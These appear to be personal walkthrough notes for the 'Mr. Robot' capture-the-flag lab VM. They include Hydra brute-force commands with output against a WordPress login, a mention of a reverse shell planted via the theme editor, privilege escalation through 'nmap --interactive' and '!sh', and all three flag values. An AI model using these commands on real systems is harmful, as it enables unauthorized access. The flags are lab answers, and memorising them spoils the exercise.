User-agent: *
fsocity.dic
key-1-of-3.txt 073403c8a58a1f80d943455fb30724b9



http://192.168.56.156/license
what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?




└─$ hydra -L username -p test 192.168.56.156 http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^:F=Invalid username" -t 40 -v
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-06-05 01:53:18
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 40 tasks per 1 server, overall 40 tasks, 11453 login tries (l:11453/p:1), ~287 tries per task
[DATA] attacking http-post-form://192.168.56.156:80/wp-login.php:log=^USER^&pwd=^PASS^:F=Invalid username
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[STATUS] 3848.00 tries/min, 3848 tries in 00:01h, 7605 to do in 00:02h, 40 active
[80][http-post-form] host: 192.168.56.156   login: Elliot   password: test
[80][http-post-form] host: 192.168.56.156   login: elliot   password: test
[80][http-post-form] host: 192.168.56.156   login: ELLIOT   password: test
[STATUS] 3858.50 tries/min, 7717 tries in 00:02h, 3736 to do in 00:01h, 40 active
[STATUS] attack finished for 192.168.56.156 (waiting for children to complete tests)
[80][http-post-form] host: 192.168.56.156   password: test
1 of 1 target successfully completed, 4 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-06-05 01:56:26

    └─$ hydra -l elliot -P username 192.168.56.156 http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^:F=The password you entered for the username" -t 40 -v
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-06-05 02:02:41
[DATA] max 40 tasks per 1 server, overall 40 tasks, 11453 login tries (l:1/p:11453), ~287 tries per task
[DATA] attacking http-post-form://192.168.56.156:80/wp-login.php:log=^USER^&pwd=^PASS^:F=The password you entered for the username
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
      [STATUS] 3375.00 tries/min, 3375 tries in 00:01h, 8078 to do in 00:03h, 40 active
 [STATUS] 3240.00 tries/min, 6480 tries in 00:02h, 4973 to do in 00:02h, 40 active
[STATUS] 3262.33 tries/min, 9787 tries in 00:03h, 1666 to do in 00:01h, 40 active
    [STATUS] attack finished for 192.168.56.156 (waiting for children to complete tests)
[80][http-post-form] host: 192.168.56.156   login: elliot
[VERBOSE] Page redirected to http[s]://192.168.56.156:80/wp-admin/
[VERBOSE] Page redirected to http[s]://192.168.56.156:80/wp-login.php?redirect_to=http%3A%2F%2F192.168.56.156%3A80%2Fwp-admin%2F&reauth=1
[80][http-post-form] host: 192.168.56.156   login: elliot   password: ER28-0652
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-06-05 02:06:14

//apperance->editor->index template ,update of reverse shell
//then visit it at hte path of 
    http://192.168.56.156/wp-content/themes/twentyfifteen/

    daemon@linux:/home$ cd robot
    cd robot
    daemon@linux:/home/robot$ ls
    ls
    key-2-of-3.txt	password.raw-md5
    daemon@linux:/home/robot$ cat key-2-of-3.txt
    cat key-2-of-3.txt
    cat: key-2-of-3.txt: Permission denied
    daemon@linux:/home/robot$ ls -la
    ls -la
    total 16
    drwxr-xr-x 2 root  root  4096 Nov 13  2015 .
    drwxr-xr-x 3 root  root  4096 Nov 13  2015 ..
    -r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
    -rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5
    daemon@linux:/home/robot$ cat password.raw-md5
    cat password.raw-md5
    robot:c3fcd3d76192e4007dfb496cca67e13b   abcdefghijklmnopqrstuvwxyz
    daemon@linux:/home/robot$ su robot
    su robot
    Password: abcdefghijklmnopqrstuvwxyz
    
    robot@linux:~$ sudo -l
    sudo -l
    [sudo] password for robot: abcdefghijklmnopqrstuvwxyz
    
    Sorry, user robot may not run sudo on linux.
    robot@linux:~$ ls -la
    ls -la
    total 16
    drwxr-xr-x 2 root  root  4096 Nov 13  2015 .
    drwxr-xr-x 3 root  root  4096 Nov 13  2015 ..
    -r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
    -rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5
    robot@linux:~$ cat key-2-of-3.txt
    cat key-2-of-3.txt
    822c73956184f694993bede3eb39f959

    robot@linux:/$ nmap --interactive
    nmap --interactive
    
    Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
    Welcome to Interactive Mode -- press h <enter> for help
    nmap> !sh
    !sh
    # id
    id
    uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
    # cd /root
    cd /root
    # ls -la
    ls -la
    total 32
    drwx------  3 root root 4096 Nov 13  2015 .
    drwxr-xr-x 22 root root 4096 Sep 16  2015 ..
    -rw-------  1 root root 4058 Nov 14  2015 .bash_history
    -rw-r--r--  1 root root 3274 Sep 16  2015 .bashrc
    drwx------  2 root root 4096 Nov 13  2015 .cache
    -rw-r--r--  1 root root    0 Nov 13  2015 firstboot_done
    -r--------  1 root root   33 Nov 13  2015 key-3-of-3.txt
    -rw-r--r--  1 root root  140 Feb 20  2014 .profile
    -rw-------  1 root root 1024 Sep 16  2015 .rnd
    # cat key-3-of-3.txt
    cat key-3-of-3.txt
    04787ddef27c3dee1ee161b21670b4e4
    
